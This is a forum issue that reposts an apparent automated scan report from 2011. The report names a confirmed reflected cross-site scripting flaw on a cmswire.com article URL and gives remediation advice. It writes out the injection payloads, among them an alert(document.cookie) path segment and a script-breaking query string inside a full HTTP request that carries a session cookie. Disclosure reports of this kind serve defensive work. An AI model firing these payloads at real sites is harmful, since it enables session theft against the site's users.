FGF-College-Work / Forum

:beer: A space dedicated to discussion and Q&A about courses and technology content.
MIT License

Reflected XSS, CWE-79, CAPEC-86, cmswire.com REPORT SUMMARY #163

Open marcialwushu opened 5 years ago

marcialwushu commented 5 years ago

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

TARGET URL http://www.cmswire.com/cms/web-publishing/wor...
SCAN DATE 4/22/2011 9:22:18 PM
REPORT DATE 4/22/2011 9:37:45 PM
SCAN DURATION 00:07:52

GHDB, DORK Tests

PROFILE Previous Settings
ENABLED ENGINES Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting

VULNERABILITY SUMMARY

URL | Parameter | Method | Vulnerability | Confirmed
/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364%2527 | Query Based | QUERYSTRING | Cross-site Scripting | Yes
(same URL) | | | Cookie Not Marked As HttpOnly | Yes
(same URL) | | | Apache Version Disclosure | No

Cross-site Scripting

XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser. XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well-structured white-list libraries available for many different environments; good examples of these include OWASP Reform and the Microsoft Anti Cross-site Scripting library.

Remedy References

External References

/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364%2527 CONFIRMED

http://www.cmswire.com/cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d..

Parameters

Parameter | Type | Value
Query Based | QUERYSTRING | '"-->

Request

GET /cms/web-publishing/wordpress-31-more-of-a-cms-than-ever-before-010310.php/81d20%22-alert(document.cookie)-%224959465b364%2527?'"--></style></script><script>netsparker(0x0000AF)</script> HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.cmswire.com
Cookie: PHPSESSID=46b4bd41b5eef5c3a961c2cea3b72653
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Sat, 23 Apr 2011 03:29:25 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: max-age=1200
Expires: Sat, 23 Apr 2011 03:49:25 GMT
Vary: Accept-Encoding
Content-Encoding: 
Content-Length: 16603
Connection: close
Content-Type: text/html

